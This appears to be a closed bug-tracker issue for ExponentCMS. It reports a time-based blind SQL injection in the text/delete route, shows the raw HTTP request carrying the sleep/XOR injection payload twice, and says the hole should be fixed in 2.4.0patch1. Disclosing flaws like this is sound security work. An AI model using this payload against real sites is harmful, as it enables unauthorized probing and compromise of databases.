Closed exponentcms closed 4 years ago
GET /exponent/text/delete/id/if(now()%3dsysdate()%2csleep(0)%2c0)/'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22//src/@footer HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://192.168.118.1:80/exponent/ Cookie: PHPSESSID=e965beb8dc3e7046008f7d832de5b554; adminer_key=cdeaea5d52a8f402a28bd04980a7851b Host: 192.168.118.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: /
This should be fixed in 2.4.0patch1 released Nov 4th
Lighthouse URL: https://exponentcms.lighthouseapp.com/projects/61783/tickets/1393
GET /exponent/text/delete/id/if(now()%3dsysdate()%2csleep(0)%2c0)/'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22//src/@footer HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://192.168.118.1:80/exponent/ Cookie: PHPSESSID=e965beb8dc3e7046008f7d832de5b554; adminer_key=cdeaea5d52a8f402a28bd04980a7851b Host: 192.168.118.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: /